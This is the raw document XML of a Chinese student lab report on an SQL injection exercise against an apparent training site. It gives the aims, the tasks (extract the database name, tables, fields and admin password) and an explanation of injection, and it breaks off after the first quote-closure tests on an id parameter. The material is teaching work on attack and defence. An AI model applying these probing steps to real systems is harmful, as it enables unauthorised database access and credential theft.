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4AB811">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="2"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="2"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>《网络空间安全概论》实验报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605BCE64">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="2"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="8"/>
        <w:tblW w:w="83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192"/>
        <w:gridCol w:w="1837"/>
        <w:gridCol w:w="431"/>
        <w:gridCol w:w="934"/>
        <w:gridCol w:w="767"/>
        <w:gridCol w:w="2956"/>
      </w:tblGrid>
      <w:tr w14:paraId="3F7D5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455" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A52B34A">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姓名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="551879F6">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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="513BA7EF">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年级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2956" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="45166205">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r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>2022</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5288D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455" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="34D992F5">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学号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="19F34A13">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bookmarkStart w:id="34" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="34"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F87602B">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专业、班级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2956" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="46343458">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r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>计算机科学与技术(卓越)01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="63D70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263" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F19F4A4">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实验名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7117" w:type="dxa"/>
            <w:gridSpan w:val="6"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7ED48B75">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r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>实验</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>四</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>SQL注入实验</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3C124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9" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1263" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="296FBFC0">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实验时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2029" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="47AB6494">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r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>25.5.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1365" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="399EBA13">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实验地点</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3723" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3BBB5D0A">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r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>DS402</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5C1CF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263" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="154AF77F">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实验成绩</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2029" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3897B2E9">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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1365" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="03B288CE">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 xml:space="preserve"> 实验性质</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3723" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="326199EC">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□验证性  □设计性  □综合性</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4850C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9" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8380" w:type="dxa"/>
            <w:gridSpan w:val="7"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="57" w:type="dxa"/>
              <w:left w:w="142" w:type="dxa"/>
              <w:bottom w:w="57" w:type="dxa"/>
              <w:right w:w="567" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3FA8BB11">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>教师评价：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37372D75">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:rPr>
                <w:rFonts w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="0" w:name="OLE_LINK65"/>
            <w:bookmarkStart w:id="1" w:name="OLE_LINK56"/>
            <w:bookmarkStart w:id="2" w:name="OLE_LINK30"/>
            <w:bookmarkStart w:id="3" w:name="OLE_LINK60"/>
            <w:bookmarkStart w:id="4" w:name="OLE_LINK4"/>
            <w:bookmarkStart w:id="5" w:name="OLE_LINK48"/>
            <w:bookmarkStart w:id="6" w:name="OLE_LINK53"/>
            <w:bookmarkStart w:id="7" w:name="OLE_LINK58"/>
            <w:bookmarkStart w:id="8" w:name="OLE_LINK43"/>
            <w:bookmarkStart w:id="9" w:name="OLE_LINK20"/>
            <w:bookmarkStart w:id="10" w:name="OLE_LINK45"/>
            <w:bookmarkStart w:id="11" w:name="OLE_LINK54"/>
            <w:bookmarkStart w:id="12" w:name="OLE_LINK44"/>
            <w:bookmarkStart w:id="13" w:name="OLE_LINK9"/>
            <w:bookmarkStart w:id="14" w:name="OLE_LINK40"/>
            <w:bookmarkStart w:id="15" w:name="OLE_LINK55"/>
            <w:bookmarkStart w:id="16" w:name="OLE_LINK29"/>
            <w:bookmarkStart w:id="17" w:name="OLE_LINK10"/>
            <w:bookmarkStart w:id="18" w:name="OLE_LINK46"/>
            <w:bookmarkStart w:id="19" w:name="OLE_LINK49"/>
            <w:bookmarkStart w:id="20" w:name="OLE_LINK63"/>
            <w:bookmarkStart w:id="21" w:name="OLE_LINK37"/>
            <w:bookmarkStart w:id="22" w:name="OLE_LINK27"/>
            <w:bookmarkStart w:id="23" w:name="OLE_LINK6"/>
            <w:bookmarkStart w:id="24" w:name="OLE_LINK47"/>
            <w:bookmarkStart w:id="25" w:name="OLE_LINK57"/>
            <w:bookmarkStart w:id="26" w:name="OLE_LINK28"/>
            <w:bookmarkStart w:id="27" w:name="OLE_LINK64"/>
            <w:bookmarkStart w:id="28" w:name="OLE_LINK41"/>
            <w:bookmarkStart w:id="29" w:name="OLE_LINK19"/>
            <w:bookmarkStart w:id="30" w:name="OLE_LINK5"/>
            <w:bookmarkStart w:id="31" w:name="OLE_LINK59"/>
            <w:bookmarkStart w:id="32" w:name="OLE_LINK21"/>
            <w:bookmarkStart w:id="33" w:name="OLE_LINK31"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t>□</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t xml:space="preserve">算法/实验过程正确； </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t>□</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t xml:space="preserve">源程序/实验内容提交  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t>□</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t>程序结构/实验步骤合理；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B74F74E">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:rPr>
                <w:rFonts w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t>□</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t xml:space="preserve">实验结果正确；      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t>□</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t xml:space="preserve">语法、语义正确；     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t>□</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t>报告规范；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">         </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59A0E0E8">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t>评语：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体"/>
              </w:rPr>
              <w:t xml:space="preserve">                           </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="168A75F3">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51" w:firstLine="330" w:firstLineChars="150"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体"/>
              </w:rPr>
              <w:t xml:space="preserve">                             评价教师签名（电子签名）：</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Fonts w:ascii="宋体"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3B6783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3" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8380" w:type="dxa"/>
            <w:gridSpan w:val="7"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="57" w:type="dxa"/>
              <w:left w:w="142" w:type="dxa"/>
              <w:bottom w:w="57" w:type="dxa"/>
              <w:right w:w="567" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6ADCBE5E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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bCs/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>一、实验目的</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13FC1DEC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="28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学习并掌握SQL注入的基本原理和方法</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B023D4C">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="283" w:leftChars="0" w:hanging="283" w:firstLineChars="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>学习SQL注入的防范措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="199F9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9" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8380" w:type="dxa"/>
            <w:gridSpan w:val="7"/>
            <w:tcMar>
              <w:top w:w="57" w:type="dxa"/>
              <w:left w:w="142" w:type="dxa"/>
              <w:bottom w:w="57" w:type="dxa"/>
              <w:right w:w="567" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4C110CA6">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"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实验项目内容</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E9DAB5D">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对以下网站进行SQL注入：http://pu2lh35s.ia.aqlab.cn/，完成以下信息的获取：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70E98079">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="72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数据库名称</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20191B46">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="72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数据库中的所有表的名称</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A46199F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="72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每个表中的字段数量以及字段名</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13BC7613">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="72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管理员用户密码</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51B8721A">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最后总结如何对SQL注入攻击进行防范。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="32939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9" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8380" w:type="dxa"/>
            <w:gridSpan w:val="7"/>
            <w:tcMar>
              <w:top w:w="57" w:type="dxa"/>
              <w:left w:w="142" w:type="dxa"/>
              <w:bottom w:w="57" w:type="dxa"/>
              <w:right w:w="567" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1F67E4F8">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="default"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三、实验设计</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13B88E25">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:ind w:firstLine="440" w:firstLineChars="200"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">任何SQL是操作数据库数据的结构化查询语言，网页的应用数据和后台数据库中的数据进行交互时会采用SQL。而SQL注入是将Web页面的原URL、表单域或数据包输入的参数，修改拼接成SQL语句，传递给Web服务器，进而传给数据库服务器以执行数据库命令。如Web应用程序的开发人员对用户所输入的数据或cookie等内容不进行过滤或验证(即存在注入点)就直接传输给数据库，就可能导致拼接的SQL被执行，获取对数据库的信息以及提权，发生SQL注入攻击。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2924D856">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p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7A947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8380" w:type="dxa"/>
            <w:gridSpan w:val="7"/>
            <w:tcMar>
              <w:top w:w="57" w:type="dxa"/>
              <w:left w:w="142" w:type="dxa"/>
              <w:bottom w:w="57" w:type="dxa"/>
              <w:right w:w="567" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="25865641">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"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实验过程或算法</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59A191C2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="283" w:leftChars="0" w:hanging="283" w:firstLine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准备工作：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67D5C58F">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>首先，访问目标网址：http://pu2lh35s.ia.aqlab.cn/，点击页面上的蓝色交互按钮。此时，页面加载出一些介绍性内容，并且地址栏的 URL 变为：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4983ADDA">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5C5C5C"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>http://pu2lh35s.ia.aqlab.cn/?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="C18401"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="5C5C5C"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>=1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="282930E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:leftChars="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="3759835" cy="2249170"/>
                  <wp:effectExtent l="0" t="0" r="24765"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3759835" cy="2249170"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E81D850">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:leftChars="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2E20E5A0">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:ind w:firstLine="440" w:firstLineChars="200"/>
            </w:pPr>
            <w:r>
              <w:t>由此可推测该网站通过 GET 请求方式传递参数，进一步尝试进行单双引号闭合测试，以判断是否存在 SQL 注入漏洞。具体操作如下：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E580DE0">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:ind w:firstLine="440" w:firstLineChars="200"/>
            </w:pPr>
            <w:r>
              <w:t>传入单引号 id='1 或双引号 id="1"，页面均无返回内容，说明 SQL 查询语句因语法错误而无法执行。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="508CFD28">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3780790" cy="2249170"/>
